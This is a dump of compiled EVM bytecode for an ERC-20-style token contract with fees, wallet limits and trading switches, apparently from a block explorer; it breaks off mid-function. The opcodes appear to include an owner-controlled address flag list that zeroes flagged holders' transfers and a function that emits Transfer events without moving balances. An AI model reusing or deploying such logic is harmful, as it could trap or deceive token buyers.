03611a5c576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611a5390613dd7565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603611aca576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611ac190613e65565b60405180910390fd5b5f60025f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205403611b51574360025f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055505b5f8103611b6857611b6383835f61275a565b6124d6565b600860179054906101000a900460ff161561204d57611b85610eb8565b73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1614158015611bf35750611bc3610eb8565b73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b8015611c2b57505f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b8015611c65575061dead73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1614155b8015611c7e5750600860149054906101000a900460ff16155b1561204c57600860159054906101000a900460ff16611d725760115f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff1680611d32575060115f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff165b611d71576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611d6890613ef3565b60405180910390fd5b5b60135f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff168015611e0f575060125f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16155b15611eb657600d54811115611e59576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611e5090613f81565b60405180910390fd5b600c54611e6583610db0565b82611e70919061363a565b1115611eb1576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611ea890613fe9565b60405180910390fd5b61204b565b60135f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff168015611f53575060125f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16155b15611fa257600d54811115611f9d576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611f9490614077565b60405180910390fd5b61204a565b60125f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff1661204957600c54611ffc83610db0565b82612007919061363a565b1115612048576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161203f90613fe9565b60405180910390fd5b5b5b5b5b5b5f61205730610db0565b90505f600954821015905080801561207b5750600860169054906101000a900460ff165b80156120945750600860149054906101000a900460ff16155b80156120e7575060135f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16155b801561213a575060115f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16155b801561218d575060115f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16155b801561219b575042600b5414155b156121e6576001600860146101000a81548160ff0219169083151502179055506121c4836129cf565b42600b819055505f600860146101000a81548160ff0219169083151502179055505b5f600860149054906101000a900460ff16905060115f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff1680612294575060115f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff165b1561229d575f90505b5f6122a88588612ad4565b945081156124c65760135f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16801561230757505f600f54115b1561233b576123346064612326600f5488612bec90919063ffffffff16565b612c0190919063ffffffff16565b90506124a3565b60135f8873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16801561239257505f600e54115b156123c6576123bf60646123b1600e5488612bec90919063ffffffff16565b612c0190919063ffffffff16565b90506124a2565b5f60105411801561241e575060135f8873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16155b8015612471575060135f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff16155b156124a15761249e606461249060105488612bec90919063ffffffff16565b612c0190919063ffffffff16565b90505b5b5b5f8111156124b7576124b687308361275a565b5b80856124c39190614095565b94505b6124d187878761275a565b505050505b505050565b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603612549576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161254090614138565b60405180910390fd5b612554825f83612c16565b5f805f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050818111156125d7576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016125ce906141c6565b60405180910390fd5b8181015f808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055505f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161267791906131e2565b60405180910390a3505050565b5f60065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1690508160065f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b5f80612751612c1b565b90508091505090565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036127c8576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016127bf90613dd7565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603612836576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161282d90613e65565b60405180910390fd5b612841838383612c16565b5f805f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050818110156128c4576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016128bb90614254565b60405180910390fd5b8181035f808673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550815f808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f828254612952919061363a565b925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516129b691906131e2565b60405180910390a36129c9848484612cbf565b50505050565b5f6129d930610db0565b90505f8082036129ea575050612ad1565b600a548211156129fa57600a5491505b600860189054906101000a900460ff168015612a215750600f83612a1e91906137f1565b82115b15612a3657600f83612a3391906137f1565b91505b5f829050612a4381612cc4565b60085f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1647604051612a889061429f565b5f6040518083038185875af1925050503d805f8114612ac2576040519150601f19603f3d011682016040523d82523d5f602084013e612ac7565b606091505b5050809250505050505b50565b5f80603290505f60025f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205443612b249190614095565b90505f8282612b3391906137f1565b90505f60648211612b5057816064612b4b9190614095565b612b52565b5f5b90505f60648289612b6391906137f1565b612b6d919061385f565b905060145f8873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff1615612bdd57612bd15f82612ef790919063ffffffff16565b95505050505050612be6565b87955050505050505b92915050565b5f8183612bf991906137f1565b905092915050565b5f8183612c0e919061385f565b905092915050565b505050565b5f8073ffffffffffffffffffffffffffffffffffffffff1660065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614612c975760065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16612cba565b60075f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff165b905090565b505050565b5f600267ffffffffffffffff811115612ce057612cdf6142b3565b5b604051908082528060200260200182016040528015612d0e5781602001602082028036833780820191505090505b50905030815f81518110612d2557612d2461350b565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff16815250507f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015612dc8573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190612dec91906142f4565b81600181518110612e0057612dff61350b565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050612e65307f0000000000000000000000000000000000000000000000000000000000000000846117ad565b7f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff1663791ac947835f8430426040518663ffffffff1660e01b8152600401612ec6959493929190614418565b5f604051808303815f87803b158015612edd575f80fd5b505af1158015612eef573d5f803e3d5ffd5b505050505050565b5f81831015612f065781612f08565b825b905092915050565b5f81519050919050565b5f82825260208201905092915050565b5f5b83811015612f47578082015181840152602081019050612f2c565b5f8484015250505050565b5f601f19601f8301169050919050565b5f612f6c82612f10565b612f768185612f1a565b9350612f86818560208601612f2a565b612f8f81612f52565b840191505092915050565b5f6020820190508181035f830152612fb28184612f62565b905092915050565b5f80fd5b5f80fd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f612feb82612fc2565b9050919050565b612ffb81612fe1565b8114613005575f80fd5b50565b5f8135905061301681612ff2565b92915050565b5f819050919050565b61302e8161301c565b8114613038575f80fd5b50565b5f8135905061304981613025565b92915050565b5f806040838503121561306557613064612fba565b5b5f61307285828601613008565b92505060206130838582860161303b565b9150509250929050565b5f8115159050919050565b6130a18161308d565b82525050565b5f6020820190506130ba5f830184613098565b92915050565b5f80fd5b5f80fd5b5f80fd5b5f8083601f8401126130e1576130e06130c0565b5b8235905067ffffffffffffffff8111156130fe576130fd6130c4565b5b60208301915083602082028301111561311a576131196130c8565b5b9250929050565b61312a8161308d565b8114613134575f80fd5b50565b5f8135905061314581613121565b92915050565b5f805f6040848603121561316257613161612fba565b5b5f84013567ffffffffffffffff81111561317f5761317e612fbe565b5b61318b868287016130cc565b9350935050602061319e86828701613137565b9150509250925092565b5f602082840312156131bd576131bc612fba565b5b5f6131ca84828501613008565b91505092915050565b6131dc8161301c565b82525050565b5f6020820190506131f55f8301846131d3565b92915050565b5f806040838503121561321157613210612fba565b5b5f61321e85828601613008565b925050602061322f85828601613137565b9150509250929050565b5f805f606084860312156132505761324f612fba565b5b5f61325d86828701613008565b935050602061326e86828701613008565b925050604061327f8682870161303b565b9150509250925092565b5f60608201905061329c5f830186613098565b6132a960208301856131d3565b6132b660408301846131d3565b949350505050565b5f60ff82169050919050565b6132d3816132be565b82525050565b5f6020820190506132ec5f8301846132ca565b92915050565b5f805f806060858703121561330a57613309612fba565b5b5f85013567ffffffffffffffff81111561332757613326612fbe565b5b613333878288016130cc565b9450945050602061334687828801613008565b92505060406133578782880161303b565b91505092959194509250565b5f6020828403121561337857613377612fba565b5b5f6133858482850161303b565b91505092915050565b61339781612fe1565b82525050565b5f6020820190506133b05f83018461338e565b92915050565b5f6060820190506133c95f8301866131d3565b6133d660208301856131d3565b6133e360408301846131d3565b949350505050565b5f805f6060848603121561340257613401612fba565b5b5f61340f86828701613137565b93505060206134208682870161303b565b92505060406134318682870161303b565b9150509250925092565b5f806040838503121561345157613450612fba565b5b5f61345e85828601613008565b925050602061346f85828601613008565b9150509250929050565b5f60608201905061348c5f830186613098565b6134996020830185613098565b6134a66040830184613098565b949350505050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f60028204905060018216806134f257607f821691505b602082108103613505576135046134ae565b5b50919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52603260045260245ffd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f61356f8261301c565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82036135a1576135a0613538565b5b600182019050919050565b7f45524332303a207472616e7366657220616d6f756e74206578636565647320615f8201527f6c6c6f77616e6365000000000000000000000000000000000000000000000000602082015250565b5f613606602883612f1a565b9150613611826135ac565b604082019050919050565b5f6020820190508181035f830152613633816135fa565b9050919050565b5f6136448261301c565b915061364f8361301c565b925082820190508082111561366757613666613538565b5b92915050565b7f546f74616c207472616e73666572206665652063616e6e6f74206265206869675f8201527f686572207468616e203130302500000000000000000000000000000000000000602082015250565b5f6136c7602d83612f1a565b91506136d28261366d565b604082019050919050565b5f6020820190508181035f8301526136f4816136bb565b9050919050565b7f546f74616c2073656c6c206665652063616e6e6f7420626520686967686572205f8201527f7468616e20313030250000000000000000000000000000000000000000000000602082015250565b5f613755602983612f1a565b9150613760826136fb565b604082019050919050565b5f6020820190508181035f83015261378281613749565b9050919050565b7f43616e6e6f7420736574206d61785478206c6f776572207468616e20302e32255f82015250565b5f6137bd602083612f1a565b91506137c882613789565b602082019050919050565b5f6020820190508181035f8301526137ea816137b1565b9050919050565b5f6137fb8261301c565b91506138068361301c565b92508282026138148161301c565b9150828204841483151761382b5761382a613538565b5b5092915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601260045260245ffd5b5f6138698261301c565b91506138748361301c565b92508261388457613883613832565b5b828204905092915050565b7f43616e6e6f7420736574206d617857616c6c6574206c6f776572207468616e205f8201527f302e352500000000000000000000000000000000000000000000000000000000602082015250565b5f6138e9602483612f1a565b91506138f48261388f565b604082019050919050565b5f6020820190508181035f830152613916816138dd565b9050919050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f775f8201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b5f613977602583612f1a565b91506139828261391d565b604082019050919050565b5f6020820190508181035f8301526139a48161396b565b9050919050565b7f5377617020616d6f756e742063616e6e6f74206265206c6f776572207468616e5f8201527f20302e30312520746f74616c20737570706c792e000000000000000000000000602082015250565b5f613a05603483612f1a565b9150613a10826139ab565b604082019050919050565b5f6020820190508181035f830152613a32816139f9565b9050919050565b7f6d6178696d756d20616d6f756e742063616e74206265206869676865722074685f8201527f616e206d696e696d756d00000000000000000000000000000000000000000000602082015250565b5f613a93602a83612f1a565b9150613a9e82613a39565b604082019050919050565b5f6020820190508181035f830152613ac081613a87565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f20615f8201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b5f613b21602683612f1a565b9150613b2c82613ac7565b604082019050919050565b5f6020820190508181035f830152613b4e81613b15565b9050919050565b7f546f74616c20627579206665652063616e6e6f742062652068696768657220745f8201527f68616e2031303025000000000000000000000000000000000000000000000000602082015250565b5f613baf602883612f1a565b9150613bba82613b55565b604082019050919050565b5f6020820190508181035f830152613bdc81613ba3565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f206164645f8201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b5f613c3d602483612f1a565b9150613c4882613be3565b604082019050919050565b5f6020820190508181035f830152613c6a81613c31565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f2061646472655f8201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b5f613ccb602283612f1a565b9150613cd682613c71565b604082019050919050565b5f6020820190508181035f830152613cf881613cbf565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65725f82015250565b5f613d33602083612f1a565b9150613d3e82613cff565b602082019050919050565b5f6020820190508181035f830152613d6081613d27565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f2061645f8201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b5f613dc1602583612f1a565b9150613dcc82613d67565b604082019050919050565b5f6020820190508181035f830152613dee81613db5565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f20616464725f8201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b5f613e4f602383612f1a565b9150613e5a82613df5565b604082019050919050565b5f6020820190508181035f830152613e7c81613e43565b9050919050565b7f5f7472616e736665723a3a2054726164696e67206973206e6f742061637469765f8201527f652e000000000000000000000000000000000000000000000000000000000000602082015250565b5f613edd602283612f1a565b9150613ee882613e83565b604082019050919050565b5f6020820190508181035f830152613f0a81613ed1565b9050919050565b7f427579207472616e7366657220616d6f756e74206578636565647320746865205f8201527f6d617854782e0000000000000000000000000000000000000000000000000000602082015250565b5f613f6b602683612f1a565b9150613f7682613f11565b604082019050919050565b5f6020820190508181035f830152613f9881613f5f565b9050919050565b7f4d61782077616c6c6574206578636565646564000000000000000000000000005f82015250565b5f613fd3601383612f1a565b9150613fde82613f9f565b602082019050919050565b5f6020820190508181035f83015261400081613fc7565b9050919050565b7f53656c6c207472616e7366657220616d6f756e742065786365656473207468655f8201527f206d617854782e00000000000000000000000000000000000000000000000000602082015250565b5f614061602783612f1a565b915061406c82614007565b604082019050919050565b5f6020820190508181035f83015261408e81614055565b9050919050565b5f61409f8261301c565b91506140aa8361301c565b92508282039050818111156140c2576140c1613538565b5b92915050565b7f45524332303a206275726e2066726f6d20746865207a65726f206164647265735f8201527f7300000000000000000000000000000000000000000000000000000000000000602082015250565b5f614122602183612f1a565b915061412d826140c8565b604082019050919050565b5f6020820190508181035f83015261414f81614116565b9050919050565b7f45524332303a206275726e20616d6f756e7420657863656564732062616c616e5f8201527f6365000000000000000000000000000000000000000000000000000000000000602082015250565b5f6141b0602283612f1a565b91506141bb82614156565b604082019050919050565b5f6020820190508181035f8301526141dd816141a4565b9050919050565b7f45524332303a207472616e7366657220616d6f756e74206578636565647320625f8201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b5f61423e602683612f1a565b9150614249826141e4565b604082019050919050565b5f6020820190508181035f83015261426b81614232565b9050919050565b5f81905092915050565b50565b5f61428a5f83614272565b91506142958261427c565b5f82019050919050565b5f6142a98261427f565b9150819050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b5f815190506142ee81612ff2565b92915050565b5f6020828403121561430957614308612fba565b5b5f614316848285016142e0565b91505092915050565b5f819050919050565b5f819050919050565b5f61434b6143466143418461431f565b614328565b61301c565b9050919050565b61435b81614331565b82525050565b5f81519050919050565b5f82825260208201905092915050565b5f819050602082019050919050565b61439381612fe1565b82525050565b5f6143a4838361438a565b60208301905092915050565b5f602082019050919050565b5f6143c682614361565b6143d0818561436b565b93506143db8361437b565b805f5b8381101561440b5781516143f28882614399565b97506143fd836143b0565b9250506001810190506143de565b5085935050505092915050565b5f60a08201905061442b5f8301886131d3565b6144386020830187614352565b818103604083015261444a81866143bc565b9050614459606083018561338e565b61446660808301846131d3565b969550505050505056fea26469706673582212208a8982863b554086ba5b2e644d8734251d022296b45e043f06a44249c9286ed064736f6c634300081500330000000000000000000000003f16a4c5c2e235cf1affe5af640844e14f3d8c7b
Deployed Bytecode
0x6080604052600436106101fc575f3560e01c80638da5cb5b1161010c578063b6c937ce1161009f578063dd62ed3e1161006e578063dd62ed3e146106fd578063eea9351314610739578063f2fde38b14610761578063f6f6d95d14610789578063fea82751146107c757610203565b8063b6c937ce14610669578063c138e5e114610691578063c9567bf9146106bb578063caa13d20146106d157610203565b806395d89b41116100db57806395d89b411461059f578063a24c7a9a146105c9578063a457c2d7146105f1578063a9059cbb1461062d57610203565b80638da5cb5b146104f95780638ee600711461052357806391ceee8d1461054b57806392057a381461057357610203565b8063313ce5671161018f57806342966c681161015e57806342966c681461044157806370a0823114610469578063715018a6146104a55780637173163e146104bb5780638c7a0280146104d157610203565b8063313ce5671461037757806339509351146103a15780633a61363a146103dd5780633fd0e1761461040557610203565b806318160ddd116101cb57806318160ddd146102bd5780631e0d5537146102e757806323b872dd1461030f578063241a6fad1461034b57610203565b806306fdde0314610207578063095ea7b3146102315780631111f43f1461026d5780631600d3021461029557610203565b3661020357005b5f80fd5b348015610212575f80fd5b5061021b6107ef565b6040516102289190612f9a565b60405180910390f35b34801561023c575f80fd5b506102576004803603810190610252919061304f565b61087f565b60405161026491906130a7565b60405180910390f35b348015610278575f80fd5b50610293600480360381019061028e919061314b565b61089c565b005b3480156102a0575f80fd5b506102bb60048036038101906102b691906131a8565b610945565b005b3480156102c8575f80fd5b506102d1610a0b565b6040516102de91906131e2565b60405180910390f35b3480156102f2575f80fd5b5061030d600480360381019061030891906131fb565b610a14565b005b34801561031a575f80fd5b5061033560048036038101906103309190613239565b610ac2565b60405161034291906130a7565b60405180910390f35b348015610356575f80fd5b5061035f610bb4565b60405161036e93929190613289565b60405180910390f35b348015610382575f80fd5b5061038b610bd8565b60405161039891906132d9565b60405180910390f35b3480156103ac575f80fd5b506103c760048036038101906103c2919061304f565b610be0565b6040516103d491906130a7565b60405180910390f35b3480156103e8575f80fd5b5061040360048036038101906103fe91906132f2565b610c87565b005b348015610410575f80fd5b5061042b600480360381019061042691906131a8565b610d42565b60405161043891906130a7565b60405180910390f35b34801561044c575f80fd5b5061046760048036038101906104629190613363565b610d94565b005b348015610474575f80fd5b5061048f600480360381019061048a91906131a8565b610db0565b60405161049c91906131e2565b60405180910390f35b3480156104b0575f80fd5b506104b9610df5565b005b3480156104c6575f80fd5b506104cf610e08565b005b3480156104dc575f80fd5b506104f760048036038101906104f29190613363565b610e60565b005b348015610504575f80fd5b5061050d610eb8565b60405161051a919061339d565b60405180910390f35b34801561052e575f80fd5b5061054960048036038101906105449190613363565b610ee0565b005b348015610556575f80fd5b50610571600480360381019061056c9190613363565b610f79565b005b34801561057e575f80fd5b50610587611027565b604051610596939291906133b6565b60405180910390f35b3480156105aa575f80fd5b506105b361103e565b6040516105c09190612f9a565b60405180910390f35b3480156105d4575f80fd5b506105ef60048036038101906105ea9190613363565b6110ce565b005b3480156105fc575f80fd5b506106176004803603810190610612919061304f565b61117c565b60405161062491906130a7565b60405180910390f35b348015610638575f80fd5b50610653600480360381019061064e919061304f565b611262565b60405161066091906130a7565b60405180910390f35b348015610674575f80fd5b5061068f600480360381019061068a91906133eb565b61127f565b005b34801561069c575f80fd5b506106a56113b4565b6040516106b2919061339d565b60405180910390f35b3480156106c6575f80fd5b506106cf6113dc565b005b3480156106dc575f80fd5b506106e5611449565b6040516106f493929190613289565b60405180910390f35b348015610708575f80fd5b50610723600480360381019061071e919061343b565b61146d565b60405161073091906131e2565b60405180910390f35b348015610744575f80fd5b5061075f600480360381019061075a91906131fb565b6114ef565b005b34801561076c575f80fd5b50610787600480360381019061078291906131a8565b61159d565b005b348015610794575f80fd5b506107af60048036038101906107aa91906131a8565b61161f565b6040516107be93929190613479565b60405180910390f35b3480156107d2575f80fd5b506107ed60048036038101906107e89190613363565b61170d565b005b6060600480546107fe906134db565b80601f016020809104026020016040519081016040528092919081815260200182805461082a906134db565b80156108755780601f1061084c57610100808354040283529160200191610875565b820191905f5260205f20905b81548152906001019060200180831161085857829003601f168201915b5050505050905090565b5f61089261088b6117a6565b84846117ad565b6001905092915050565b6108a4611970565b5f5b8383905081101561093f578160145f8686858181106108c8576108c761350b565b5b90506020020160208101906108dd91906131a8565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff021916908315150217905550808061093790613565565b9150506108a6565b50505050565b61094d611970565b60085f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8616c7a330e3cf61290821331585511f1e2778171e2b005fb5ec60cfe874dc6760405160405180910390a38060085f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b5f600354905090565b610a1c611970565b8060115f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055508173ffffffffffffffffffffffffffffffffffffffff167f9d8f7706ea1113d1a167b526eca956215946dd36cc7df39eb16180222d8b5df782604051610ab691906130a7565b60405180910390a25050565b5f610ace8484846119ee565b5f60015f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f610b156117a6565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905082811015610b94576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b8b9061361c565b60405180910390fd5b610ba885610ba06117a6565b8584036117ad565b60019150509392505050565b5f805f600860179054906101000a900460ff169250600c549150600d549050909192565b5f6009905090565b5f610c7d610bec6117a6565b848460015f610bf96117a6565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054610c78919061363a565b6117ad565b6001905092915050565b610c8f611970565b5f5b84849050811015610d3b57848482818110610caf57610cae61350b565b5b9050602002016020810190610cc491906131a8565b73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610d2091906131e2565b60405180910390a38080610d3390613565565b915050610c91565b5050505050565b5f60145f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff169050919050565b610d9c611970565b610dad610da76117a6565b826124db565b50565b5f805f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b610dfd611970565b610e065f612684565b565b610e10611970565b5f600860176101000a81548160ff0219169083151502179055505f601081905550427ff4eaa75eae08ae80c3daf791438dac1cff2cfd3b0bad2304ec7bbb067e50261660405160405180910390a2565b610e68611970565b8060108190555060646010541115610eb5576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610eac906136dd565b60405180910390fd5b50565b5f60065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b610ee8611970565b80600f819055506064600f541115610f35576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f2c9061376b565b60405180910390fd5b7fcb5f36df892836a2eaedc349de29a7581176990398ee185d16eaa8f6c1abd8f1600f54600f54600f54604051610f6e939291906133b6565b60405180910390a150565b610f81611970565b6002811015610fc5576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610fbc906137d3565b60405180910390fd5b6103e8610fd0610a0b565b82610fdb91906137f1565b610fe5919061385f565b600d819055507fff3dd5e80294197918c284bbfc3dadd97d0b40ce92106110946329088f80068a600d5460405161101c91906131e2565b60405180910390a150565b5f805f600e549250600f5491506010549050909192565b60606005805461104d906134db565b80601f0160208091040260200160405190810160405280929190818152602001828054611079906134db565b80156110c45780601f1061109b576101008083540402835291602001916110c4565b820191905f5260205f20905b8154815290600101906020018083116110a757829003601f168201915b5050505050905090565b6110d6611970565b600581101561111a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401611111906138ff565b60405180910390fd5b6103e8611125610a0b565b8261113091906137f1565b61113a919061385f565b600c819055507f12528a3c61e0f3b2d6fc707a9fc58b1af86e252cad0d7f4c154ebeabb162dace600c5460405161117191906131e2565b60405180910390a150565b5f8060015f6111896117a6565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905082811015611243576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161123a9061398d565b60405180910390fd5b61125761124e6117a6565b858584036117ad565b600191505092915050565b5f61127561126e6117a6565b84846119ee565b6001905092915050565b611287611970565b60018210156112cb576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016112c290613a1b565b60405180910390fd5b8181101561130e576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161130590613aa9565b60405180910390fd5b82600860166101000a81548160ff02191690831515021790555061271082611334610a0b565b61133e91906137f1565b611348919061385f565b6009819055506127108161135a610a0b565b61136491906137f1565b61136e919061385f565b600a819055507f52cd2cdb42ff0eeec9362d7ed5b04f64c8d022697128b5378fc51cea7e63c7798383836040516113a793929190613289565b60405180910390a1505050565b5f60085f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6113e4611970565b6001600860156101000a81548160ff0219169083151502179055506001600860166101000a81548160ff021916908315150217905550427fb3da2db3dfc3778f99852546c6e9ab39ec253f9de7b0847afec61bd27878e92360405160405180910390a2565b5f805f600860169054906101000a900460ff1692506009549150600a549050909192565b5f60015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373fffffffffffffffffffffffffffffffffffff